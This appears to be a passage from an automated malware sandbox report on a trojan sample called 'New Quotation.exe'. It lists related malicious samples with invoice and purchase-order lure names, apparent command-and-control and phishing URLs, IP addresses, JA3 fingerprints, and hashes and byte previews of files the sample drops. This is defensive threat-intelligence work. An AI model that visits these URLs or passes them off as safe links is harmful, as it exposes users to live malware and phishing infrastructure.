                                                                                                                                                New Purchase Order 501,689$.exeGet hashmaliciousBrowse
                                                                                                                                                • www.touchtoby.xyz/eao/?xb08qf=VTmoKKvx2MjW0uKiu4+UQd0geT1qXzFifY4DRrzvOayWPZ9vFittzVDKTnEbNF7hw535&1bz=xpn0PfXxSXAtfZap
                                                                                                                                                New Purchase Order 501,689$.exeGet hashmaliciousBrowse
                                                                                                                                                • www.touchtoby.xyz/eao/?1bxhAH=KnudHLXxD8&3fm=VTmoKKvx2MjW0uKiu4+UQd0geT1qXzFifY4DRrzvOayWPZ9vFittzVDKTnEbNF7hw535
                                                                                                                                                New Purchase Order 501,689$.exeGet hashmaliciousBrowse
                                                                                                                                                • www.touchtoby.xyz/eao/?v4cPe=lBZl20ex&NTETmJ=VTmoKKvx2MjW0uKiu4+UQd0geT1qXzFifY4DRrzvOayWPZ9vFittzVDKTkoyOFHZ5aCv4S6j/A==
                                                                                                                                                New Purchase Order 501,689$.exeGet hashmaliciousBrowse
                                                                                                                                                • www.touchtoby.xyz/eao/?hBZpUr88=VTmoKKvx2MjW0uKiu4+UQd0geT1qXzFifY4DRrzvOayWPZ9vFittzVDKTkkLCkrZuce+&nfut_N=xPJt_Tlp9
                                                                                                                                                New Purchase Order 50,689$.exeGet hashmaliciousBrowse
                                                                                                                                                • www.touchtoby.xyz/eao/?tFQh=XRclsNQPL8U&p0D=VTmoKKvx2MjW0uKiu4+UQd0geT1qXzFifY4DRrzvOayWPZ9vFittzVDKTkoLR0na3Meo4S6ksw==
                                                                                                                                                New Purchase Order 501,689$.exeGet hashmaliciousBrowse
                                                                                                                                                • www.touchtoby.xyz/eao/?1bB0mR=VTmoKKvx2MjW0uKiu4+UQd0geT1qXzFifY4DRrzvOayWPZ9vFittzVDKTnEbNF7hw535&UPC=yvCdVR2
                                                                                                                                                Swift0011MGD.Scan.pdf..exeGet hashmaliciousBrowse
                                                                                                                                                • www.paradenge.xyz/fgn/?rVExDJ=BG+ahY3e45jGNDUfuL8M8iVElQ82NbhSaYLVIGpn4NX6qOIHKH5SvyXitcGjxR5QK+KoxbSILg==&GzrLH=WBmlk4kP3RuPHt
                                                                                                                                                New Purchase Order 50,689$.exeGet hashmaliciousBrowse
                                                                                                                                                • www.touchtoby.xyz/eao/?sN=XxlTxbk0bRLtdLp&7nt4il2=VTmoKKvx2MjW0uKiu4+UQd0geT1qXzFifY4DRrzvOayWPZ9vFittzVDKTkkLCkrZuce+
                                                                                                                                                New Purchase Order 50,689$.exeGet hashmaliciousBrowse
                                                                                                                                                • www.touchtoby.xyz/eao/?jFN4C=VTmoKKvx2MjW0uKiu4+UQd0geT1qXzFifY4DRrzvOayWPZ9vFittzVDKTnExS1Lh07/5&Rl=UvyX
                                                                                                                                                Confirmation Copy 11.exeGet hashmaliciousBrowse
                                                                                                                                                • www.davidguner.com/3iw/?DzrLW=Fql9g/ma7c+/rW8IcvIPMzGIUc5v7dMVbxDoc426ShI3pwVnZjmExMTk1y1t/ro+8pGW&QFQLCr=0bm0AT28fhupX6q0
                                                                                                                                                19PO25072018.exeGet hashmaliciousBrowse
                                                                                                                                                • www.tipobet526.com/da/?9rI=wMIr1dufzP2QfnZOTeEraFG/XR+/rE2szs0NxFzp9/wgMVlNhZ2CSP12kSvIYUzX7RuFd071hDyLgyZ1&5jb=9rxPdxR
                                                                                                                                                Invoic.exeGet hashmaliciousBrowse
                                                                                                                                                • www.antalyacelikev.com/h21/
                                                                                                                                                29Order pdf.exeGet hashmaliciousBrowse
                                                                                                                                                • www.ermaksmuhendislik.com/ca/
                                                                                                                                                61PI#INV_0683.exeGet hashmaliciousBrowse
                                                                                                                                                • www.deluxtur.net/la/?id=8GuJDKObeW9lPNWN33pd93zWAnv8B53xLv16uX+Udr/H4Hy0/34crNZAj1qzGay30axmrLN4ASjeTdYlcaI7Lw==&sql=1
                                                                                                                                                36Attached PO 601970.rar ().exeGet hashmaliciousBrowse
                                                                                                                                                • www.kibristakumar.com/ha/?vh9h=mvK/ueLHZcgzArBVkiMs4ub/pAARg+D99w62SwGxwR2+eApjceHK8XCdsVF1ibg+H4XP&ON98b=IheP

                                                                                                                                                Domains

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                parkingpage.namecheap.coma4blA5O6u7.exeGet hashmaliciousBrowse
                                                                                                                                                • 198.54.117.211
                                                                                                                                                SHIPPING DOC.exeGet hashmaliciousBrowse
                                                                                                                                                • 198.54.117.217
                                                                                                                                                inquirt valete.exeGet hashmaliciousBrowse
                                                                                                                                                • 198.54.117.212
                                                                                                                                                ysvlX6dCFR.exeGet hashmaliciousBrowse
                                                                                                                                                • 198.54.117.216
                                                                                                                                                BL of Shipment.exeGet hashmaliciousBrowse
                                                                                                                                                • 198.54.117.218
                                                                                                                                                SecuriteInfo.com.W32.AIDetectNet.01.8396.exeGet hashmaliciousBrowse
                                                                                                                                                • 198.54.117.217
                                                                                                                                                Formcomp profile survey sheet.exeGet hashmaliciousBrowse
                                                                                                                                                • 198.54.117.218
                                                                                                                                                account_error_info_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                • 198.54.117.215
                                                                                                                                                Revised bookings_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                • 198.54.117.218
                                                                                                                                                price_list_34266_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                • 198.54.117.217
                                                                                                                                                274MlRK418.exeGet hashmaliciousBrowse
                                                                                                                                                • 198.54.117.211
                                                                                                                                                PO#801644.exeGet hashmaliciousBrowse
                                                                                                                                                • 198.54.117.212
                                                                                                                                                Odeme.exeGet hashmaliciousBrowse
                                                                                                                                                • 198.54.117.216
                                                                                                                                                pis1vyXWYZ.exeGet hashmaliciousBrowse
                                                                                                                                                • 198.54.117.211
                                                                                                                                                triage_dropped_file.exeGet hashmaliciousBrowse
                                                                                                                                                • 198.54.117.218
                                                                                                                                                Nova ozljeda 034245627782.DOC.exeGet hashmaliciousBrowse
                                                                                                                                                • 198.54.117.215
                                                                                                                                                PO627288.exeGet hashmaliciousBrowse
                                                                                                                                                • 198.54.117.210
                                                                                                                                                triage_dropped_file.exeGet hashmaliciousBrowse
                                                                                                                                                • 198.54.117.216
                                                                                                                                                lamrtt546321.exeGet hashmaliciousBrowse
                                                                                                                                                • 198.54.117.215
                                                                                                                                                hunl3RJpzO.exeGet hashmaliciousBrowse
                                                                                                                                                • 198.54.117.211
                                                                                                                                                shops.myshopify.comSecuriteInfo.com.Variant.Tedy.121179.3350.exeGet hashmaliciousBrowse
                                                                                                                                                • 23.227.38.74
                                                                                                                                                M2C53F8CXD.exeGet hashmaliciousBrowse
                                                                                                                                                • 23.227.38.74
                                                                                                                                                Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousBrowse
                                                                                                                                                • 23.227.38.74
                                                                                                                                                TvAVEqLycD.exeGet hashmaliciousBrowse
                                                                                                                                                • 23.227.38.74
                                                                                                                                                DHL Shipment doc.exeGet hashmaliciousBrowse
                                                                                                                                                • 23.227.38.74
                                                                                                                                                BL of Shipment.exeGet hashmaliciousBrowse
                                                                                                                                                • 23.227.38.74
                                                                                                                                                SecuriteInfo.com.W32.AIDetectNet.01.8396.exeGet hashmaliciousBrowse
                                                                                                                                                • 23.227.38.74
                                                                                                                                                Swift.03425627829.exeGet hashmaliciousBrowse
                                                                                                                                                • 23.227.38.74
                                                                                                                                                Formcomp profile survey sheet.exeGet hashmaliciousBrowse
                                                                                                                                                • 23.227.38.74
                                                                                                                                                wIkvV3XeDS.exeGet hashmaliciousBrowse
                                                                                                                                                • 23.227.38.74
                                                                                                                                                PO#801644.exeGet hashmaliciousBrowse
                                                                                                                                                • 23.227.38.74
                                                                                                                                                Fatura ektedir.exeGet hashmaliciousBrowse
                                                                                                                                                • 23.227.38.74
                                                                                                                                                Error_Account_info.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                • 23.227.38.74
                                                                                                                                                Order confirmation 5679021.exeGet hashmaliciousBrowse
                                                                                                                                                • 23.227.38.74
                                                                                                                                                SecuriteInfo.com.Variant.Lazy.175133.22115.exeGet hashmaliciousBrowse
                                                                                                                                                • 23.227.38.74
                                                                                                                                                gZU26RjMUU.exeGet hashmaliciousBrowse
                                                                                                                                                • 23.227.38.74
                                                                                                                                                TT copy.exeGet hashmaliciousBrowse
                                                                                                                                                • 23.227.38.74
                                                                                                                                                PRE-ALERT ==HTHC22031529.scrGet hashmaliciousBrowse
                                                                                                                                                • 23.227.38.74
                                                                                                                                                EwF4PTC8NF.exeGet hashmaliciousBrowse
                                                                                                                                                • 23.227.38.74
                                                                                                                                                Popis narudzbi u prilogu.exeGet hashmaliciousBrowse
                                                                                                                                                • 23.227.38.74

                                                                                                                                                ASNs

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                TR-FBSTRpandora.arm7Get hashmaliciousBrowse
                                                                                                                                                • 93.89.234.145
                                                                                                                                                https://www.medione.com.tr/OVLA/Get hashmaliciousBrowse
                                                                                                                                                • 93.89.235.46
                                                                                                                                                informe_002.xlsGet hashmaliciousBrowse
                                                                                                                                                • 93.89.232.85
                                                                                                                                                MES_3103.xlsGet hashmaliciousBrowse
                                                                                                                                                • 93.89.232.85
                                                                                                                                                paquete-3103.xlsGet hashmaliciousBrowse
                                                                                                                                                • 93.89.232.85
                                                                                                                                                Linux_amd64Get hashmaliciousBrowse
                                                                                                                                                • 185.33.233.19
                                                                                                                                                Linux_x86Get hashmaliciousBrowse
                                                                                                                                                • 185.33.233.22
                                                                                                                                                Linux_amd64Get hashmaliciousBrowse
                                                                                                                                                • 185.33.233.21
                                                                                                                                                stage-1413660880.xlsGet hashmaliciousBrowse
                                                                                                                                                • 93.89.224.146
                                                                                                                                                stage-1413660880.xlsGet hashmaliciousBrowse
                                                                                                                                                • 93.89.224.146
                                                                                                                                                stage-1191917643.xlsGet hashmaliciousBrowse
                                                                                                                                                • 93.89.224.146
                                                                                                                                                stage-1191917643.xlsGet hashmaliciousBrowse
                                                                                                                                                • 93.89.224.146
                                                                                                                                                o0TYGLXPS5.exeGet hashmaliciousBrowse
                                                                                                                                                • 185.33.234.96
                                                                                                                                                Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousBrowse
                                                                                                                                                • 93.89.232.5
                                                                                                                                                60rUtFJPFb.exeGet hashmaliciousBrowse
                                                                                                                                                • 93.89.224.169
                                                                                                                                                QJfoKgzkov.exeGet hashmaliciousBrowse
                                                                                                                                                • 185.33.234.112
                                                                                                                                                __ __ __.exeGet hashmaliciousBrowse
                                                                                                                                                • 93.89.226.17
                                                                                                                                                PO.exeGet hashmaliciousBrowse
                                                                                                                                                • 93.89.226.17
                                                                                                                                                Halkbank_Ekstre_20191102_073809_405251-PDF.exeGet hashmaliciousBrowse
                                                                                                                                                • 185.33.234.169
                                                                                                                                                AMAZON-02USSwift Copy_MT103_pdf.ppaGet hashmaliciousBrowse
                                                                                                                                                • 104.192.141.1
                                                                                                                                                Drawing06102022.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 3.64.163.50
                                                                                                                                                Swift Copy_MT103_pdf.ppaGet hashmaliciousBrowse
                                                                                                                                                • 104.192.141.1
                                                                                                                                                kUqev9QSjY.exeGet hashmaliciousBrowse
                                                                                                                                                • 3.13.191.225
                                                                                                                                                ZETj96F18t.exeGet hashmaliciousBrowse
                                                                                                                                                • 3.13.191.225
                                                                                                                                                SUvMbZ98Ic.exeGet hashmaliciousBrowse
                                                                                                                                                • 3.13.191.225
                                                                                                                                                sHTPIIPLLg.exeGet hashmaliciousBrowse
                                                                                                                                                • 3.141.126.222
                                                                                                                                                https://www.bordmilliondollarsamericanswitchmiddleeast.comGet hashmaliciousBrowse
                                                                                                                                                • 143.204.9.109
                                                                                                                                                Gun3xbWCNGGet hashmaliciousBrowse
                                                                                                                                                • 108.129.136.131
                                                                                                                                                https://docs.google.com/presentation/d/e/2PACX-1vRPOa4NG-hYdhIW7qRvjqfam_O5TzTFQNBKuON4VHohSUi6sSP3eGUFKdB0R_O7Fl67gdPDHIFD5SVQ/pub?start=false&loop=false&delayms=3000#OGXFIREKWTUJZXAEJQXARPNRJJDCPDRWJRLCGETYELRZWADZNJWXLLQZXLTESUZSSFGet hashmaliciousBrowse
                                                                                                                                                • 108.156.2.95
                                                                                                                                                sora.mpslGet hashmaliciousBrowse
                                                                                                                                                • 35.152.59.48
                                                                                                                                                sora.mipsGet hashmaliciousBrowse
                                                                                                                                                • 18.146.49.132
                                                                                                                                                sora.armGet hashmaliciousBrowse
                                                                                                                                                • 34.220.228.173
                                                                                                                                                sgIemiCjGT.exeGet hashmaliciousBrowse
                                                                                                                                                • 3.22.15.135
                                                                                                                                                wA3N8VsGWK.exeGet hashmaliciousBrowse
                                                                                                                                                • 3.64.163.50
                                                                                                                                                448RVIM193Get hashmaliciousBrowse
                                                                                                                                                • 34.255.120.27
                                                                                                                                                https://whiteguydiesfirst.comGet hashmaliciousBrowse
                                                                                                                                                • 34.241.126.16
                                                                                                                                                SecuriteInfo.com.Program.RemoteAdminNET.1.29844.msiGet hashmaliciousBrowse
                                                                                                                                                • 35.157.63.229
                                                                                                                                                presentation .ppaGet hashmaliciousBrowse
                                                                                                                                                • 104.192.141.1
                                                                                                                                                QRJCdtkHy6Get hashmaliciousBrowse
                                                                                                                                                • 15.206.183.212

                                                                                                                                                JA3 Fingerprints

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                37f463bf4616ecd445d4a1937da06e19Swift Copy_MT103_pdf.ppaGet hashmaliciousBrowse
                                                                                                                                                • 142.250.186.110
                                                                                                                                                • 172.217.19.65
                                                                                                                                                05267389200-2-9002.exeGet hashmaliciousBrowse
                                                                                                                                                • 142.250.186.110
                                                                                                                                                • 172.217.19.65
                                                                                                                                                Novi popis narudzbi.exeGet hashmaliciousBrowse
                                                                                                                                                • 142.250.186.110
                                                                                                                                                • 172.217.19.65
                                                                                                                                                https://www.gandcautoboidypcollaburative-gandnegrete.com/Get hashmaliciousBrowse
                                                                                                                                                • 142.250.186.110
                                                                                                                                                • 172.217.19.65
                                                                                                                                                https://www.bordmilliondollarsamericanswitchmiddleeast.comGet hashmaliciousBrowse
                                                                                                                                                • 142.250.186.110
                                                                                                                                                • 172.217.19.65
                                                                                                                                                SecuriteInfo.com.Trojan.Siggen18.3626.32531.exeGet hashmaliciousBrowse
                                                                                                                                                • 142.250.186.110
                                                                                                                                                • 172.217.19.65
                                                                                                                                                SecuriteInfo.com.Trojan.Win32.Injector.38f1ad00.3221.exeGet hashmaliciousBrowse
                                                                                                                                                • 142.250.186.110
                                                                                                                                                • 172.217.19.65
                                                                                                                                                https://cyan-ebony-emery.glitch.me/index-1.html#ginny@skyline-holt.comGet hashmaliciousBrowse
                                                                                                                                                • 142.250.186.110
                                                                                                                                                • 172.217.19.65
                                                                                                                                                Overlakehospital Swift.htmlGet hashmaliciousBrowse
                                                                                                                                                • 142.250.186.110
                                                                                                                                                • 172.217.19.65
                                                                                                                                                CP_92206.exeGet hashmaliciousBrowse
                                                                                                                                                • 142.250.186.110
                                                                                                                                                • 172.217.19.65
                                                                                                                                                2022-06-09 Fra. VN22-85 001225 (GFV_1 de B96575725).exeGet hashmaliciousBrowse
                                                                                                                                                • 142.250.186.110
                                                                                                                                                • 172.217.19.65
                                                                                                                                                FACTURA Y ALBARANES.exeGet hashmaliciousBrowse
                                                                                                                                                • 142.250.186.110
                                                                                                                                                • 172.217.19.65
                                                                                                                                                presentation .ppaGet hashmaliciousBrowse
                                                                                                                                                • 142.250.186.110
                                                                                                                                                • 172.217.19.65
                                                                                                                                                https://click.smartsheet.com/f/a/PkoYsLLfW9TybUNJ5o-_Ow~~/AARF7wA~/RgRkhJ0zP0QiaHR0cHM6Ly9tdnNjOS5hcHAubGluay9oaFlmSGViT0lxYlcDc3BjQgpimjMYomIl3yJgUiRjaHJpc3RvcGhlci5wcml0Y2hhcmRAZXhwZWRpdG9ycy5jb21YBAAAAAA~Get hashmaliciousBrowse
                                                                                                                                                • 142.250.186.110
                                                                                                                                                • 172.217.19.65
                                                                                                                                                http://sunsetsuppression.top/SBB/tb.php?kcocekfx1654803484244Get hashmaliciousBrowse
                                                                                                                                                • 142.250.186.110
                                                                                                                                                • 172.217.19.65
                                                                                                                                                ATT001.htmGet hashmaliciousBrowse
                                                                                                                                                • 142.250.186.110
                                                                                                                                                • 172.217.19.65
                                                                                                                                                ATT001.htmGet hashmaliciousBrowse
                                                                                                                                                • 142.250.186.110
                                                                                                                                                • 172.217.19.65
                                                                                                                                                #U00aeInvoice Payment#U00ae.htmlGet hashmaliciousBrowse
                                                                                                                                                • 142.250.186.110
                                                                                                                                                • 172.217.19.65
                                                                                                                                                https://styledindustrial.com/Adobe_93287_adobe.htmlGet hashmaliciousBrowse
                                                                                                                                                • 142.250.186.110
                                                                                                                                                • 172.217.19.65
                                                                                                                                                https://u26450666.ct.sendgrid.net/ls/click?upn=HHDla31mld6mlcE9MB5n5Amv9jJ5hNB6r1Sz9Lj4FF79B2u-2FRCFZUu2tF6-2FKdwkMTHBKzoNJdo32BLpdsBg1v9rZQABCevVfRL9ILD-2F3Tg8vcIyh47594tWRAYe3EOuVxIf9Yox3ZnyRcoi72-2FD39w-3D-3DDclq_dHCLaIkA5S2ay6L9FkG37Ea0PyJgR2h0CXSxfTXE8h5X-2BH54DFJLoLjd15Yx2ktty9KX0DIxfZL0e48V68C1bvsLkh1r7NnckJ3kz-2BYoq5b7KWOwvw26CoXb9OLQWZCeIAzAKxlT5WkhOSOJafJHQddOUmDi7bApmn8PZppq88VfWIh3WtCKY5RUFRVi9o2-2B48s-2BcS5zumwX-2FwvX1ms8FA-3D-3DGet hashmaliciousBrowse
                                                                                                                                                • 142.250.186.110
                                                                                                                                                • 172.217.19.65

                                                                                                                                                Dropped Files

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                C:\Users\user\AppData\Local\Temp\nse2C2.tmp\System.dllNew Quotation.exeGet hashmaliciousBrowse
                                                                                                                                                  SecuriteInfo.com.Trojan.Siggen18.3626.32531.exeGet hashmaliciousBrowse
                                                                                                                                                    SecuriteInfo.com.W32.Ninjector.BZ.genEldorado.18897.exeGet hashmaliciousBrowse
                                                                                                                                                      SecuriteInfo.com.Trojan.Siggen18.3626.32531.exeGet hashmaliciousBrowse
                                                                                                                                                        SecuriteInfo.com.W32.Ninjector.BZ.genEldorado.18897.exeGet hashmaliciousBrowse
                                                                                                                                                          CP_92206.exeGet hashmaliciousBrowse
                                                                                                                                                            CP_92206.exeGet hashmaliciousBrowse
                                                                                                                                                              2022-06-09 Fra. VN22-85 001225 (GFV_1 de B96575725).exeGet hashmaliciousBrowse
                                                                                                                                                                FACTURA Y ALBARANES.exeGet hashmaliciousBrowse
                                                                                                                                                                  2022-06-09 Fra. VN22-85 001225 (GFV_1 de B96575725).exeGet hashmaliciousBrowse
                                                                                                                                                                    FACTURA Y ALBARANES.exeGet hashmaliciousBrowse
                                                                                                                                                                      SecuriteInfo.com.Variant.Razy.950064.8197.exeGet hashmaliciousBrowse
                                                                                                                                                                        SecuriteInfo.com.Variant.Razy.950064.8197.exeGet hashmaliciousBrowse
                                                                                                                                                                          fatura pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                            Shipment Document BL,INV and packing list.jpg.exeGet hashmaliciousBrowse
                                                                                                                                                                              Quotation_No 200000002504.exeGet hashmaliciousBrowse
                                                                                                                                                                                FACTURA Y ALBARANES.exeGet hashmaliciousBrowse
                                                                                                                                                                                  fatura pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                    Shipment Document BL,INV and packing list.jpg.exeGet hashmaliciousBrowse
                                                                                                                                                                                      Quotation_No 200000002504.exeGet hashmaliciousBrowse

                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Bushelfuls.Out

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\New Quotation.exe
                                                                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):23734
                                                                                                                                                                                        Entropy (8bit):3.999302713253801
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:384:v0osz1IaGcVlxevhgTNXnKgkb3O+2kJKGdec+7DN7zfC9ckiCfnvb5fkc6LUTY14:cxIaG8lxeZRbTJKGd7+pfsjiynvbFkcd
                                                                                                                                                                                        MD5:474AB95AE9573CE5D86D964C05FBAC27
                                                                                                                                                                                        SHA1:87BAC344ECD974D8D98DE52F59BC0A932E97A649
                                                                                                                                                                                        SHA-256:4D17039D83FAA4E1941A9AF514B138A97757B2A3BDB539A96F78C1D868E1C286
                                                                                                                                                                                        SHA-512:624D35234F544FF576DBCB5CF1DF4B3BFDA75B3467568B6B0269108090D0D841D88D2786D73331CF0A9AF263303ED8646C64BB393A40DBE7D2C45AA8FE26A78F
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                        Preview:AD69D109324A0BFF974573D56FE80E9520C1B0CD872FB565B2DBF2D839F4AA11ED998D043A0AC99560AA89807589FA204BD4C1FD12DE1FF83EE1A121445B04A5A9C9130FB26DCE281812302C8E68696BAB2CA437527DE74DB6CEF277DB223A96027D6B5B4C45457BD14F01219A3A793DC642B2D18CDA216929A1274B3815CFA1DB1CA1CC1610D79F372F2475F294BFCA0D9511B3AC2EDDEA239E5137FC09B0A4627C90801E28FC78AD9F041F086DF41BB6250F10820AF1B4CA9878B4674806E45A099E899FAAD57EBE7CE6FD4E81564D34190D5CA0EB7E63D55B646CBE19D9817FE5457A2980370B0CFCA2086EF92C2AF404631C44F4BFDAAD322BAB63C649AC529D27A9BC1DAF15FA3007177AB6D771D3313B4DC50E33EAAB403C3DA0948F5C51919D57846327860D3821D7B644212C9275759147B16053ACB1684CDE6B61C97DBBFCCDDA692A29C3BF0F0B2966201160BDD5A07CCFEDB78FAAC66054CCFF809651C408BC882BDF01EA4C8C07BF2D2525D20CB8DB7D58A97D0A429025BDA03CF6745BD9E33851FEEC9834C6F0B1E2D9BA3DC7DCBEF0A657536B1D114D52DF93272456B0AB40C52CB479832B2AD550158E12D175F7D3E3D69FF5ADF40AD6CEAAE188F6ABEC9E2088E00388B09B02D4B4C91F389771969C2F698F2D324B0F365C92C548F4E1D2CEC3CE9784DB4F6283F09613D8BD

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Orchel.Hai3

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\New Quotation.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):98161
                                                                                                                                                                                        Entropy (8bit):6.731931823438077
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:1536:pddN24Gfxtl/g4Ed4YHUnwa8cvZcjG09xki8PeiQQu0GZI9+Iip:TdkTfxnEaSUwwv3EZ8PFS0GK99ip
                                                                                                                                                                                        MD5:A7B58A7E53B388CBACF7023A943E7581
                                                                                                                                                                                        SHA1:645D4DF07EFB7D3DCEC295FF1730670ABE7A0F7E
                                                                                                                                                                                        SHA-256:CDCC8AA0A1995FCA96A7FFA9EDEB3308DBA480A6D5C9B2DF814F12E304B4E44C
                                                                                                                                                                                        SHA-512:5F81011EEF536C6CD7CB0330E134885D2F54CD6DEE1DEE9F80EE1CD217FED6E8A829FD0526E198CEC24AF418293473FBF0916BC8A93447902FBA1B5535E65335
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:I....j..2...kk..~.[..........V9.P.:.[G..Md.BIgtF..XV@{.W......>...&,y@^L....o?.A........*.].KvnU..x_.-l.RK.%o7M.iF.....1,..5.:w..).x;..:HwTN~..F.PG.......k.4.U^..vB.A...O...+5NOz.ag"..>a\h.)..g..@.T..m...AL.oA....+O.....i;.....>^..Qz..v..6.t.zn...p.].uF...*.W..7..p...U....(.../g....?AY|2.U.../....lB.a....K..K ......#'.eE.O...n....7..W...5...80r......l.m\.3v.'1...6L..?d.3.e.m..@".A.0..(K.......(r..}..g....q>.|..p.Y..r....3Q4....!BO.Gd5.x#...-6F..i...@..1b...d).....M..F..U..k._..IW....VD.b...:jZkWrL..q0_..#...ar...H.Q..e..zza.C$......&Y.3..._?..(W~.....an.."..Y6....,g.l!..}D....jr....d....A.R..;....\.q.=VJw.].=am.a...............9-....dg.?.-}....#O.v[...~..~.Q...w./....]....].. `.[.'.iK2..8td.......'.f.}S^@"3...F...AQ.26........#.NZ.......\...T.K_.....6.d5......>R>..G...U...v....2.Q.%.@.t..h.a5..Q.]eJ......[..>.....=..n...C...........[..d.O..$....xqK..n..D2...}..cF......\. {..tF6...esZ.....?a......}.......:S..Tp..x..2H.-[k.|t....f.

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\nse2C2.tmp\System.dll

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\New Quotation.exe
                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):12288
                                                                                                                                                                                        Entropy (8bit):5.814115788739565
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                                                                                                                                                                        MD5:CFF85C549D536F651D4FB8387F1976F2
                                                                                                                                                                                        SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                                                                                                                                                                                        SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                                                                                                                                                                                        SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                        • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                        • Filename: New Quotation.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: SecuriteInfo.com.Trojan.Siggen18.3626.32531.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: SecuriteInfo.com.W32.Ninjector.BZ.genEldorado.18897.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: SecuriteInfo.com.Trojan.Siggen18.3626.32531.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: SecuriteInfo.com.W32.Ninjector.BZ.genEldorado.18897.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: CP_92206.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: CP_92206.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: 2022-06-09 Fra. VN22-85 001225 (GFV_1 de B96575725).exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: FACTURA Y ALBARANES.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: 2022-06-09 Fra. VN22-85 001225 (GFV_1 de B96575725).exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: FACTURA Y ALBARANES.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: SecuriteInfo.com.Variant.Razy.950064.8197.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: SecuriteInfo.com.Variant.Razy.950064.8197.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: fatura pdf.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: Shipment Document BL,INV and packing list.jpg.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: Quotation_No 200000002504.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: FACTURA Y ALBARANES.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: fatura pdf.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: Shipment Document BL,INV and packing list.jpg.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: Quotation_No 200000002504.exe, Detection: malicious, Browse
                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\pan-start-symbolic-rtl.symbolic.png

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\New Quotation.exe
                                                                                                                                                                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):147
                                                                                                                                                                                        Entropy (8bit):5.970332484616167
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:yionv//thPl9vt3lAnsrtxBllPLlPDK6PC1/VzG1xrBUCFNl+1+1VqmLDA5pMTdp:6v/lhPysldDw9s7r2CFNx10mOi5p
                                                                                                                                                                                        MD5:DA56060D7F4D5373C579F4FB45F19DB6
                                                                                                                                                                                        SHA1:CC1246D71B57B7925A035DAF62FF1CF5EE6AAC95
